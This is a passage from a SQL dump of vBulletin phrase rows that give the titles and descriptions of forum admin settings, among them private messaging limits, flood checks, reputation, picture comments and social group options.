(39213, -1, 'setting_minuserlength_title', 'vbsettings', 'Minimum Username Length', 'vbulletin', 'vBulletin Solutions', 1199365212, '3.7.0 Beta 4'),
(39214, -1, 'setting_moderatenewmembers_desc', 'vbsettings', 'Allows you to validate new members before they are classified as registered members and are allowed to post.', 'vbulletin', '', 0, ''),
(39215, -1, 'setting_moderatenewmembers_title', 'vbsettings', 'Moderate New Members', 'vbulletin', '', 0, ''),
(39216, -1, 'setting_mqlimit_desc', 'vbsettings', 'Enter a value to limit the number of quotes that can be created with Multi-Quote, once this limit is reached the user will be unable to add any more quotes. \r\n \r\nNote: The Quote BB code can still be entered manually, this is not a limit on the number of quotes in a post. ', 'vbulletin', 'vBulletin Solutions', 1199365436, '3.7.0 Beta 4'),
(39217, -1, 'setting_mqlimit_title', 'vbsettings', 'Multi-Quote Quote Limit', 'vbulletin', 'vBulletin Solutions', 1199365436, '3.7.0 Beta 4'),
(39218, -1, 'setting_multimatchscore_desc', 'vbsettings', 'If the search query is for multiple words, this number will be added to the score for the item each time another word from the query is found.', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39219, -1, 'setting_multimatchscore_title', 'vbsettings', 'Search Relevance Multi-Word Match Bonus Score', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39220, -1, 'setting_multiquote_desc', 'vbsettings', 'If this option is enabled, an additional button will appear on posts. A user may click as many of these buttons as they wish. Once they click a reply button, the content of each of the selected posts will be quoted and shown in the reply window.', 'vbulletin', 'vBulletin Solutions', 1150975918, '3.6.0 Beta 4'),
(39221, -1, 'setting_multiquote_title', 'vbsettings', 'Multi-Quote Enabled', 'vbulletin', 'vBulletin Solutions', 1150975918, '3.6.0 Beta 4'),
(39222, -1, 'setting_nav_forumdesc_desc', 'vbsettings', 'This option displays the forum description in the navbar. Helps visitors to know what the topic of a forum is, as well as possibly increasing search engine rankings.', 'vbulletin', '', 0, ''),
(39223, -1, 'setting_nav_forumdesc_title', 'vbsettings', 'Enable Forum Description', 'vbulletin', '', 0, ''),
(39224, -1, 'setting_needfromemail_desc', 'vbsettings', 'Some sendmail servers may require the \'-f\' parameter to be sent with email calls from PHP. If you are having problems with users not receiving email, try enabling this option. In all likelihood, your problem will not be caused by this setting. \r\n \r\nThis setting does not work when PHP SAFE MODE is enabled. ', 'vbulletin', 'vBulletin Solutions', 1205425035, '3.7.0 Release Candidate 1'),
(39225, -1, 'setting_needfromemail_title', 'vbsettings', 'Enable \'-f\' Parameter', 'vbulletin', 'vBulletin Solutions', 1205425035, '3.7.0 Release Candidate 1'),
(39226, -1, 'setting_newuseremail_desc', 'vbsettings', 'This email address will receive an email message when a new user signs up. Leave the option blank to disable this function.', 'vbulletin', '', 0, ''),
(39227, -1, 'setting_newuseremail_title', 'vbsettings', 'Email Address to Notify About New Members', 'vbulletin', '', 0, ''),
(39228, -1, 'setting_nocacheheaders_desc', 'vbsettings', 'Selecting yes will cause vBulletin to add no-cache HTTP headers. These are very effective, so adding them may cause server load to increase due to an increase in page requests.', 'vbulletin', '', 0, ''),
(39229, -1, 'setting_nocacheheaders_title', 'vbsettings', 'Add No-Cache HTTP Headers', 'vbulletin', '', 0, ''),
(39230, -1, 'setting_noeditedbytime_desc', 'vbsettings', 'Time limit (in minutes) to allow user to edit the post without the \"Last edited by...\" message appearing at the bottom of the edited post.', 'vbulletin', 'vBulletin Solutions', 1191410456, '3.7.0 Beta 1'),
(39231, -1, 'setting_noeditedbytime_title', 'vbsettings', 'Time to Wait Before Starting to Display \'Last Edited by...\'', 'vbulletin', 'vBulletin Solutions', 1191410474, '3.7.0 Beta 1'),
(39232, -1, 'setting_numavatarsperpage_desc', 'vbsettings', 'How many avatars do you want to display per-page on the \'Edit Avatar\' page within the profile editor? \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1208954866, '3.7.0 Release Candidate 4'),
(39233, -1, 'setting_numavatarsperpage_title', 'vbsettings', 'Avatars Per-Page', 'vbulletin', 'vBulletin Solutions', 1208954866, '3.7.0 Release Candidate 4'),
(39234, -1, 'setting_numavatarswide_desc', 'vbsettings', 'How many columns of avatars do you wish to display to the user when selecting a pre-defined avatar?', 'vbulletin', 'vBulletin Solutions', 1199365358, '3.7.0 Beta 4'),
(39235, -1, 'setting_numavatarswide_title', 'vbsettings', 'Avatar Display Width', 'vbulletin', 'vBulletin Solutions', 1199365358, '3.7.0 Beta 4'),
(39236, -1, 'setting_oneannounce_desc', 'vbsettings', 'Combine a forum\'s announcements into one listing, where the newest announcement is displayed?', 'vbulletin', '', 0, ''),
(39237, -1, 'setting_oneannounce_title', 'vbsettings', 'Group Announcements', 'vbulletin', '', 0, ''),
(39238, -1, 'setting_pagenavpages_desc', 'vbsettings', 'If a thread/forum (etc.) requires multiple pages to be displayed, this option selects how many page links either side of the current page are shown. Set this to 0 to display all pages.', 'vbulletin', '', 0, ''),
(39239, -1, 'setting_pagenavpages_title', 'vbsettings', 'Number of Pages Visible in Page Navigator', 'vbulletin', '', 0, ''),
(39240, -1, 'setting_pagenavs_desc', 'vbsettings', 'If a thread/forum (etc.) requires multiple pages to be displayed, this option selects what pages can be jumped to relative to the current one. For example, by adding 10 to the list, links will appear for current page -10 and current page +10.', 'vbulletin', '', 0, ''),
(39241, -1, 'setting_pagenavs_title', 'vbsettings', 'Relative Jumps for Page Navigator', 'vbulletin', '', 0, ''),
(39242, -1, 'setting_paymentemail_desc', 'vbsettings', 'An email will be sent to this email address when a paid subscription is purchased or reversed.', 'vbulletin', 'vBulletin Solutions', 1147373791, '3.6.0 Beta 1'),
(39243, -1, 'setting_paymentemail_title', 'vbsettings', 'Paid Subscription Email Notification', 'vbulletin', 'vBulletin Solutions', 1147373791, '3.6.0 Beta 1'),
(39244, -1, 'setting_pc_allowed_bbcode_desc', 'vbsettings', 'This setting allows you to enable and disable the use of various BB codes in picture comments. \r\n \r\nNote that any changes you make will only affect messages posted (or edited) after this point.', 'vbulletin', 'vBulletin Solutions', 1205422221, '3.7.0 Release Candidate 1'),
(39245, -1, 'setting_pc_allowed_bbcode_title', 'vbsettings', 'Allowed BB Code Tags in Picture Comments', 'vbulletin', 'vBulletin Solutions', 1205422221, '3.7.0 Release Candidate 1'),
(39246, -1, 'setting_pc_enabled_desc', 'vbsettings', 'Set this option to yes if you would like to enable commenting on album and group pictures. Comments are associated with the picture itself, so comments will be shown anywhere the picture is shown.', 'vbulletin', 'vBulletin Solutions', 1205419725, '3.7.0 Release Candidate 1'),
(39247, -1, 'setting_pc_enabled_title', 'vbsettings', 'Enable Picture Comments', 'vbulletin', 'vBulletin Solutions', 1205419725, '3.7.0 Release Candidate 1'),
(39248, -1, 'setting_pc_maxperpage_desc', 'vbsettings', 'This setting allows you to limit the number of picture comments users may display per page with a picture. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1208954834, '3.7.0 Release Candidate 4'),
(39249, -1, 'setting_pc_maxperpage_title', 'vbsettings', 'Maximum Picture Comments Per-Page', 'vbulletin', 'vBulletin Solutions', 1208954834, '3.7.0 Release Candidate 4'),
(39250, -1, 'setting_pc_moderation_desc', 'vbsettings', 'When enabled, all new picture comments are placed into moderation. This can also be enabled in usergroup permissions.', 'vbulletin', 'vBulletin Solutions', 1205419742, '3.7.0 Release Candidate 1'),
(39251, -1, 'setting_pc_moderation_title', 'vbsettings', 'Moderate Picture Comments', 'vbulletin', 'vBulletin Solutions', 1205419742, '3.7.0 Release Candidate 1'),
(39252, -1, 'setting_pc_perpage_desc', 'vbsettings', 'This setting allows you to define the default number of picture comments displayed per-page with a picture. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1208954827, '3.7.0 Release Candidate 4'),
(39253, -1, 'setting_pc_perpage_title', 'vbsettings', 'Default Picture Comments Per-Page', 'vbulletin', 'vBulletin Solutions', 1208954827, '3.7.0 Release Candidate 4'),
(39254, -1, 'setting_pcpower_desc', 'vbsettings', 'For every X number of posts, users gain 1 point of reputation-altering power.', 'vbulletin', '', 0, ''),
(39255, -1, 'setting_pcpower_title', 'vbsettings', 'Post Count Factor', 'vbulletin', '', 0, ''),
(39256, -1, 'setting_pmfloodtime_desc', 'vbsettings', 'Private Message Flood Checking. Select the minimum time in seconds that must pass before a user can send another private message. This is to prevent a single user \'spamming\' by sending lots of messages very quickly. \r\n \r\nSet this to 0 to disable the option.', 'vbulletin', 'vBulletin Solutions', 1201873383, '3.7.0 Beta 5'),
(39257, -1, 'setting_pmfloodtime_title', 'vbsettings', 'Floodcheck - Minimum Time Between Messages', 'vbulletin', 'vBulletin Solutions', 1201873383, '3.7.0 Beta 5'),
(39258, -1, 'setting_pmmaxchars_desc', 'vbsettings', 'Maximum characters to allow in a private message. \r\n \r\nSet this to 0 for no limit.', 'vbulletin', 'vBulletin Solutions', 1199365837, '3.7.0 Beta 4'),
(39259, -1, 'setting_pmmaxchars_title', 'vbsettings', 'Maximum Characters Per Private Message', 'vbulletin', 'vBulletin Solutions', 1199365837, '3.7.0 Beta 4'),
(39260, -1, 'setting_pmmaxperpage_desc', 'vbsettings', 'This setting allows you to limit the number of messages users may display per page on the private messages folder view pages. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1216396627, '3.8.0 Alpha 1'),
(39261, -1, 'setting_pmmaxperpage_title', 'vbsettings', 'Maximum Messages Per-Page', 'vbulletin', 'vBulletin Solutions', 1216396627, '3.8.0 Alpha 1'),
(39262, -1, 'setting_pmperpage_desc', 'vbsettings', 'This setting allows you to define the default number of messages displayed per-page on the private messages listings pages. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1216396620, '3.8.0 Alpha 1'),
(39263, -1, 'setting_pmperpage_title', 'vbsettings', 'Default Messages Per-Page', 'vbulletin', 'vBulletin Solutions', 1216396620, '3.8.0 Alpha 1'),
(39264, -1, 'setting_pmthrottleperiod_desc', 'vbsettings', 'This setting allows you to specify a time period in minutes for limiting the amount of private messages sent by the user. The amount of private messages that can be sent within this time period is defined by the user\'s usergroup permissions. \r\n\r\nNote: If this is set to 0 then no throttle will be enforced.', 'vbulletin', 'vBulletin Solutions', 1216397237, '3.8.0 Alpha 1'),
(39265, -1, 'setting_pmthrottleperiod_title', 'vbsettings', 'Throttle Check Period (minutes)', 'vbulletin', 'vBulletin Solutions', 1216397237, '3.8.0 Alpha 1'),
(39266, -1, 'setting_postedithistory_desc', 'vbsettings', 'Enable this option to log the previous versions of posts when they are edited. Click the \'?\' for more information on specific cases where edits will not be logged. \r\n \r\nThis will increase the amount of disk space used by vBulletin for database storage.', 'vbulletin', 'vBulletin Solutions', 1209725045, '3.7.1'),
(39267, -1, 'setting_postedithistory_title', 'vbsettings', 'Post Edit History', 'vbulletin', 'vBulletin Solutions', 1209725045, '3.7.1'),
(39268, -1, 'setting_postelements_desc', 'vbsettings', 'There is optional user information that you may display on each post. These options require a bit of processing time to calculate.', 'vbulletin', '', 0, ''),
(39269, -1, 'setting_postelements_title', 'vbsettings', 'Post Elements', 'vbulletin', '', 0, ''),
(39270, -1, 'setting_postlog_maxage_desc', 'vbsettings', 'Whenever a post is made, extra anti-spam data is stored. This allows details about false positives and false negatives to be submitted to the chosen anti-spam system to improve it. \r\n \r\nThis value controls the length of time (in days) for which this data is stored.', 'vbulletin', 'vBulletin Solutions', 1234528408, '3.8.2'),
(39271, -1, 'setting_postlog_maxage_title', 'vbsettings', 'Anti-Spam Data Storage Length (Days)', 'vbulletin', 'vBulletin Solutions', 1234528408, '3.8.2'),
(39272, -1, 'setting_postmaxchars_desc', 'vbsettings', 'Posts that contain more characters than the value specified here will be rejected with a message telling the user to shorten their post. \r\n \r\nSet the value to 0 to disable this function.', 'vbulletin', 'vBulletin Solutions', 1199365448, '3.7.0 Beta 4'),
(39273, -1, 'setting_postmaxchars_title', 'vbsettings', 'Maximum Characters Per Post', 'vbulletin', 'vBulletin Solutions', 1199365448, '3.7.0 Beta 4'),
(39274, -1, 'setting_postminchars_desc', 'vbsettings', 'If this number is set to a value greater than 0, users must enter at least that number of characters in each new post.\r\n \r\nNote: setting this to 0 will not completely disable the minimum characters per post check. Users must always enter at least 1 character.', 'vbulletin', 'vBulletin Solutions', 1199365442, '3.7.0 Beta 4'),
(39275, -1, 'setting_postminchars_title', 'vbsettings', 'Minimum Characters Per Post', 'vbulletin', 'vBulletin Solutions', 1199365442, '3.7.0 Beta 4'),
(39276, -1, 'setting_posttitlescore_desc', 'vbsettings', 'Score for a word appearing in the post title.', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39277, -1, 'setting_posttitlescore_title', 'vbsettings', 'Search Relevance Post Title Score', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39278, -1, 'setting_privacyurl_desc', 'vbsettings', 'Enter the URL of your privacy statement, if you have one.', 'vbulletin', '', 0, ''),
(39279, -1, 'setting_privacyurl_title', 'vbsettings', 'Privacy Statement URL', 'vbulletin', '', 0, ''),
(39280, -1, 'setting_privallowbbcode_desc', 'vbsettings', 'Allow users to include BB code in their private messages? (Such as [b], [i] etc.)', 'vbulletin', 'vBulletin Solutions', 1206965572, '3.7.0 Release Candidate 2'),
(39281, -1, 'setting_privallowbbcode_title', 'vbsettings', 'Allow BB Code in Private Messages', 'vbulletin', 'vBulletin Solutions', 1195475558, '3.7.0 Beta 1'),
(39282, -1, 'setting_privallowbbimagecode_desc', 'vbsettings', 'Allow users to include [IMG] codes in their Private Messages?', 'vbulletin', '', 0, ''),
(39283, -1, 'setting_privallowbbimagecode_title', 'vbsettings', 'Allow [IMG] Code in Private Messages', 'vbulletin', '', 0, ''),
(39284, -1, 'setting_privallowhtml_desc', 'vbsettings', 'Allow users to include raw HTML code in their Private Messages? (Strongly not recommended. )', 'vbulletin', '', 0, ''),
(39285, -1, 'setting_privallowhtml_title', 'vbsettings', 'Allow HTML in Private Messages', 'vbulletin', '', 0, ''),
(39286, -1, 'setting_privallowicons_desc', 'vbsettings', 'Allow the use of the standard message icons for private messages.', 'vbulletin', '', 0, ''),
(39287, -1, 'setting_privallowicons_title', 'vbsettings', 'Allow Message Icons for Private Messages', 'vbulletin', '', 0, ''),
(39288, -1, 'setting_privallowsmilies_desc', 'vbsettings', 'Allow users to include smilies in their Private Messages?', 'vbulletin', '', 0, ''),
(39289, -1, 'setting_privallowsmilies_title', 'vbsettings', 'Allow Smilies in Private Messages', 'vbulletin', '', 0, ''),
(39290, -1, 'setting_profile_album_amount_desc', 'vbsettings', 'The Maximum Number of Albums to Display on the Users\' Profile Pages', 'vbulletin', 'vBulletin Solutions', 1199365070, '3.7.0 Beta 4'),
(39291, -1, 'setting_profile_album_amount_title', 'vbsettings', 'Number of Albums to display in the Users Profile', 'vbulletin', 'vBulletin Solutions', 1199365070, '3.7.0 Beta 4'),
(39292, -1, 'setting_profilelastpost_desc', 'vbsettings', 'Showing the last post on a member profile can cause large table scans which leads to table locking. This may increase load time on your forums as well as the load of your server. This option should only be enabled for smaller forums.', 'vbulletin', 'vBulletin Solutions', 1195216823, '3.7.0 Beta 1'),
(39293, -1, 'setting_profilelastpost_title', 'vbsettings', 'Show Last Post on Profile Page', 'vbulletin', 'vBulletin Solutions', 1195216823, '3.7.0 Beta 1'),
(39294, -1, 'setting_profilemaxvisitors_desc', 'vbsettings', 'Set an upper limit for the number of recent visitors to show. Recent visitor records are cleaned out on a regular basis, so keep this to a reasonably small number. Somewhere between 5 to 30 is ideal.', 'vbulletin', 'vBulletin Solutions', 1196463368, '3.7.0 Beta 1'),
(39295, -1, 'setting_profilemaxvisitors_title', 'vbsettings', 'Maximum Visitors to Show on Profile Page', 'vbulletin', 'vBulletin Solutions', 1196463368, '3.7.0 Beta 1'),
(39296, -1, 'setting_profilepicenabled_desc', 'vbsettings', 'Use this option to enable/disable the overall use of profile pictures. \r\n \r\nProfile pictures are small images (although usually larger than avatars) that users can upload to their profile pages.', 'vbulletin', '', 0, ''),
(39297, -1, 'setting_profilepicenabled_title', 'vbsettings', 'Profile Pictures Enabled', 'vbulletin', '', 0, ''),
(39298, -1, 'setting_profilepicpath_desc', 'vbsettings', 'Leave this setting alone.', 'vbulletin', 'vBulletin Solutions', 1216044644, '3.8.0 Alpha 1'),
(39299, -1, 'setting_profilepicpath_title', 'vbsettings', 'Profile Pic File Path', 'vbulletin', 'vBulletin Solutions', 1216044644, '3.8.0 Alpha 1'),
(39300, -1, 'setting_profilepicurl_desc', 'vbsettings', 'Leave this setting alone.', 'vbulletin', 'vBulletin Solutions', 1216044629, '3.8.0 Alpha 1'),
(39301, -1, 'setting_profilepicurl_title', 'vbsettings', 'Profile Pic URL', 'vbulletin', 'vBulletin Solutions', 1216044629, '3.8.0 Alpha 1'),
(39302, -1, 'setting_profileprivacy_desc', 'vbsettings', 'Allow users to configure their profile page so that blocks and categories are shown or hidden to specific visitors.', 'vbulletin', 'vBulletin Solutions', 1218465474, '3.8.0 Alpha 1'),
(39303, -1, 'setting_profileprivacy_title', 'vbsettings', 'Allow Users to Edit Profile Privacy', 'vbulletin', 'vBulletin Solutions', 1218465474, '3.8.0 Alpha 1'),
(39304, -1, 'setting_quickedit_desc', 'vbsettings', 'By enabling Quick Edit, a click on the Edit button in a post will open an editor within that post via AJAX if the visitor\'s browser is compatible. \r\n \r\nUsers may use the full editor by clicking the \'Go Advanced\' button in the inline editor.', 'vbulletin', '', 0, ''),
(39305, -1, 'setting_quickedit_title', 'vbsettings', 'Quick Edit', 'vbulletin', '', 0, ''),
(39306, -1, 'setting_quickreply_desc', 'vbsettings', 'If you enable Quick Reply, a box will appear on the showthread.php page allowing users to reply to the current thread without needing to load the full newreply.php page. \r\n \r\nWhen Quick Reply is enabled, you may specify whether or not users must click the Quick Reply icon in order to start typing in the Quick Reply editor. \r\n \r\nIf you choose not to require a click, the system will not know to which post a user is replying, making both the threaded and hybrid display modes nonsensical. \r\n \r\nWe strongly recommend that you set the option to require a click if you use Quick Reply and have Threaded Mode available on your forums.', 'vbulletin', '', 0, ''),
(39307, -1, 'setting_quickreply_title', 'vbsettings', 'Quick Reply', 'vbulletin', '', 0, ''),
(39308, -1, 'setting_quotetitle_desc', 'vbsettings', 'Setting this to \'Yes\' will automatically fill the title field of new posts with either the thread or the parent post title, prefixed by \'Re: \'. \r\n \r\nThe user may specify their own title if they want to do so.', 'vbulletin', '', 0, ''),
(39309, -1, 'setting_quotetitle_title', 'vbsettings', 'Automatically Quote Post / Thread Title', 'vbulletin', '', 0, ''),
(39310, -1, 'setting_ratefunc_desc', 'vbsettings', 'Allows you to specify a function to operate on the average rating of a thread. \r\nWorks like: = func($thread[rating]) * $ratingscore', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39311, -1, 'setting_ratefunc_title', 'vbsettings', 'Search Relevance Rating Function', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39312, -1, 'setting_ratescore_desc', 'vbsettings', 'Amount to multiply the average rating of a thread to get the score for the thread.', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39313, -1, 'setting_ratescore_title', 'vbsettings', 'Search Relevance Rating Score', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39314, -1, 'setting_rdpower_desc', 'vbsettings', 'For every X number of days, users gain 1 point of reputation-altering power.', 'vbulletin', '', 0, ''),
(39315, -1, 'setting_rdpower_title', 'vbsettings', 'Register Date Factor', 'vbulletin', '', 0, ''),
(39316, -1, 'setting_regimageoption_desc', 'vbsettings', 'There are several options that allow you to control the level of difficulty presented by the image verification.', 'vbulletin', 'vBulletin Solutions', 1192484082, '3.7.0 Beta 1'),
(39317, -1, 'setting_regimageoption_title', 'vbsettings', 'Image Verification Options', 'vbulletin', 'vBulletin Solutions', 1192484082, '3.7.0 Beta 1'),
(39318, -1, 'setting_regimagetype_desc', 'vbsettings', 'Choose the image processing library that vBulletin will use for generating Image Verification. If the GD (True Type) option doesn\'t work, please ask your host to recompile PHP with FreeType 2 support.\r\n Imagemagick must have a valid path specified in the Image Settings. ', 'vbulletin', 'vBulletin Solutions', 1205931861, '3.7.0 Release Candidate 1'),
(39319, -1, 'setting_regimagetype_title', 'vbsettings', 'Image Verification Library', 'vbulletin', 'vBulletin Solutions', 1205931861, '3.7.0 Release Candidate 1'),
(39320, -1, 'setting_registereddateformat_desc', 'vbsettings', 'This is used to format the user\'s registration date, which is displayed in each user\'s post. \r\n \r\nSee: http://www.php.net/manual-lookup.php?function=date ', 'vbulletin', '', 0, ''),
(39321, -1, 'setting_registereddateformat_title', 'vbsettings', 'Format For Registration Date', 'vbulletin', '', 0, ''),
(39322, -1, 'setting_remoteyui_desc', 'vbsettings', 'YUI (Yahoo! User Interface Library) script files are hosted locally on your server, you may however have them served from Yahoo or Google servers, saving you some bandwidth and potentially decreasing load times. \r\n More information about this service can be found for Yahoo! and Google .', 'vbulletin', 'vBulletin Solutions', 1231152717, '3.8.0 Release Candidate 3'),
(39323, -1, 'setting_remoteyui_title', 'vbsettings', 'Use Remote YUI', 'vbulletin', 'vBulletin Solutions', 1231152717, '3.8.0 Release Candidate 3'),
(39324, -1, 'setting_replyfunc_desc', 'vbsettings', 'Allows you to specify a function to operate on the number of replies of a thread. \r\nWorks like: = func($thread[replies]) * $replyscore', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39325, -1, 'setting_replyfunc_title', 'vbsettings', 'Search Relevance Reply Function', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39326, -1, 'setting_replyscore_desc', 'vbsettings', 'Amount to multiply the number of replies in a thread to get the score for the thread.', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39327, -1, 'setting_replyscore_title', 'vbsettings', 'Search Relevance Reply Score', 'vbulletin', 'vBulletin Solutions', 1185233737, '3.6.8'),
(39328, -1, 'setting_reputationdefault_desc', 'vbsettings', 'What reputation level shall new users receive upon registration? Make sure that you have a reputation level that is at least equal to or less than this value.', 'vbulletin', '', 0, ''),
(39329, -1, 'setting_reputationdefault_title', 'vbsettings', 'Default Reputation', 'vbulletin', '', 0, ''),
(39330, -1, 'setting_reputationenable_desc', 'vbsettings', 'Set this option to \'Yes\' if you want to enable the User Reputation system.', 'vbulletin', '', 0, ''),
(39331, -1, 'setting_reputationenable_title', 'vbsettings', 'Enable User Reputation system', 'vbulletin', '', 0, ''),
(39332, -1, 'setting_reputationrepeat_desc', 'vbsettings', 'How many different users must you give reputation to before you can hit the same person again? Administrators are exempt from this limit.', 'vbulletin', 'vBulletin Solutions', 1199365398, '3.7.0 Beta 4'),
(39333, -1, 'setting_reputationrepeat_title', 'vbsettings', 'Reputation User Spread', 'vbulletin', 'vBulletin Solutions', 1199365398, '3.7.0 Beta 4'),
(39334, -1, 'setting_reputationundefined_desc', 'vbsettings', 'If you have any user gain a reputation that exceeds your lowest negative level, then this phrase will be used for them. If you do not wish to use this phrase, make sure you set a negative reputation that is larger than the largest score (negative) that a user on your forum has.', 'vbulletin', '', 0, ''),
(39335, -1, 'setting_reputationundefined_title', 'vbsettings', 'Reputation Undefined', 'vbulletin', '', 0, ''),
(39336, -1, 'setting_reqbirthday_desc', 'vbsettings', 'Require users to provide a valid date of birth (1902 to current year).', 'vbulletin', 'vBulletin Solutions', 1195217188, '3.7.0 Beta 1'),
(39337, -1, 'setting_reqbirthday_title', 'vbsettings', 'Require Date of Birth', 'vbulletin', 'vBulletin Solutions', 1195217188, '3.7.0 Beta 1'),
(39338, -1, 'setting_requireuniqueemail_desc', 'vbsettings', 'The default option is to require unique email addresses for each registered user. This means that no two users can have the same email address. You can disable this requirement by setting this option to \'No\'.', 'vbulletin', '', 0, ''),
(39339, -1, 'setting_requireuniqueemail_title', 'vbsettings', 'Require Unique Email Addresses', 'vbulletin', '', 0, ''),
(39340, -1, 'setting_rpemail_desc', 'vbsettings', 'This option sends an email to the specified users when a post is reported.', 'vbulletin', 'vBulletin Solutions', 1149687322, '3.6.0 Beta 1'),
(39341, -1, 'setting_rpemail_title', 'vbsettings', 'Post Reporting Email', 'vbulletin', 'vBulletin Solutions', 1149687322, '3.6.0 Beta 1'),
(39342, -1, 'setting_rpforumid_desc', 'vbsettings', 'A discussion thread can be created for each reported post for moderators to discuss the post further. Choose a forum for the discussion threads to be created in.', 'vbulletin', 'vBulletin Solutions', 1149539094, '3.6.0 Beta 1'),
(39343, -1, 'setting_rpforumid_title', 'vbsettings', 'Post Reporting Discussion Forum', 'vbulletin', 'vBulletin Solutions', 1149539094, '3.6.0 Beta 1'),
(39344, -1, 'setting_rpuserid_desc', 'vbsettings', 'Reported post discussion threads default to being posted under the username of the reporter. To have the threads reported under another username, enter an existing username.', 'vbulletin', 'vBulletin Solutions', 1149695745, '3.6.0 Beta 1'),
(39345, -1, 'setting_rpuserid_title', 'vbsettings', 'Post Reporting User', 'vbulletin', 'vBulletin Solutions', 1149695745, '3.6.0 Beta 1'),
(39346, -1, 'setting_rsspodcast_desc', 'vbsettings', 'This option includes the first attachment of each thread as an enclosure within RSS2 feeds. This is the method by which Podcasting is enabled for your forums. iTunes specific settings are configured per forum in the Forum Manager.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(39347, -1, 'setting_rsspodcast_title', 'vbsettings', 'Enable Podcasting (RSS Enclosure)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(39348, -1, 'setting_safeupload_desc', 'vbsettings', 'If your server runs PHP with SAFE MODE Restrictions, set this to yes.', 'vbulletin', '', 0, ''),
(39349, -1, 'setting_safeupload_title', 'vbsettings', 'Safe Mode Upload Enabled', 'vbulletin', '', 0, ''),
(39350, -1, 'setting_searchfloodtime_desc', 'vbsettings', 'The minimum time (in seconds) that must expire before the user can perform a new search. \r\n \r\nSet this to 0 to allow users to search as frequently as they want.', 'vbulletin', 'vBulletin Solutions', 1199365647, '3.7.0 Beta 4'),
(39351, -1, 'setting_searchfloodtime_title', 'vbsettings', 'Minimum Time Between Searches', 'vbulletin', 'vBulletin Solutions', 1199365647, '3.7.0 Beta 4'),
(39352, -1, 'setting_searchperpage_desc', 'vbsettings', 'Number of successful search results to display per page. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1208954804, '3.7.0 Release Candidate 4'),
(39353, -1, 'setting_searchperpage_title', 'vbsettings', 'Search Results Posts Per Page', 'vbulletin', 'vBulletin Solutions', 1208954804, '3.7.0 Release Candidate 4'),
(39354, -1, 'setting_searchsharing_desc', 'vbsettings', 'In order to conserve resources, vBulletin will allow search results to be shared among users for one hour. The downside of this is that search results can appear out of order if a thread is updated in the interim.', 'vbulletin', '', 0, ''),
(39355, -1, 'setting_searchsharing_title', 'vbsettings', 'Search Result Sharing', 'vbulletin', '', 0, ''),
(39356, -1, 'setting_secureemail_desc', 'vbsettings', 'If \'Allow Users to Email Other Members\' is set to \'Yes\', how should members\' email addresses be displayed? \r\n \r\nIf this is set to \'Yes\', then an online form must be filled in to send a user an email, thus hiding the destination email address. \r\n \r\nSetting \'No\' will mean that the user is just given the email address in order to send email using their email client application.', 'vbulletin', '', 0, ''),
(39357, -1, 'setting_secureemail_title', 'vbsettings', 'Use Secure Email Sending', 'vbulletin', '', 0, ''),
(39358, -1, 'setting_sg_allow_delete_empty_group_desc', 'vbsettings', 'This option will allow any group owner to delete a Social Group if they are the only member of that group (even if they lack the \"Can Delete Own Social Groups\" permission)', 'vbulletin', 'vBulletin Solutions', 1218193465, '3.8.0 Alpha 1'),
(39359, -1, 'setting_sg_allow_delete_empty_group_title', 'vbsettings', 'Allow Owners to Delete Social Group if Empty', 'vbulletin', 'vBulletin Solutions', 1218193465, '3.8.0 Alpha 1'),
(39360, -1, 'setting_sg_allow_join_to_view_desc', 'vbsettings', 'When set, this allows the creator of a group the option to only show contents (messages, pictures) of the group to members of that group (or Administrators and Moderators).', 'vbulletin', 'vBulletin Solutions', 1218193399, '3.8.0 Alpha 1'),
(39361, -1, 'setting_sg_allow_join_to_view_title', 'vbsettings', 'Allow Join-to-View Groups', 'vbulletin', 'vBulletin Solutions', 1218193399, '3.8.0 Alpha 1'),
(39362, -1, 'setting_sg_allow_owner_mod_queue_desc', 'vbsettings', 'This option allows a group owner (with the Manage Own Social Groups\' Content Permission) to set the group so that all Group Messages are automatically sent to the moderation queue.', 'vbulletin', 'vBulletin Solutions', 1218193427, '3.8.0 Alpha 1'),
(39363, -1, 'setting_sg_allow_owner_mod_queue_title', 'vbsettings', 'Allow Groups Owners to Force New Group Messages into Moderation Queue', 'vbulletin', 'vBulletin Solutions', 1218193427, '3.8.0 Alpha 1'),
(39364, -1, 'setting_sg_allowed_bbcode_desc', 'vbsettings', 'This setting allows you to enable and disable the use of various BB codes in group messages. \r\n \r\nNote that any changes you make will only affect messages posted (or edited) after this point.', 'vbulletin', 'vBulletin Solutions', 1218193449, '3.8.0 Alpha 1'),
(39365, -1, 'setting_sg_allowed_bbcode_title', 'vbsettings', 'Allowed BB Code Tags in Social Group Messages', 'vbulletin', 'vBulletin Solutions', 1218193449, '3.8.0 Alpha 1'),
(39366, -1, 'setting_sg_category_cloud_size_desc', 'vbsettings', 'This setting allows you to define the number of categories to display in the Social Group Overview. \r\n \r\nNote: This number must be at least 1.', 'vbulletin', 'vBulletin Solutions', 1218193530, '3.8.0 Alpha 1'),
(39367, -1, 'setting_sg_category_cloud_size_title', 'vbsettings', 'Category Cloud Size', 'vbulletin', 'vBulletin Solutions', 1218193530, '3.8.0 Alpha 1'),
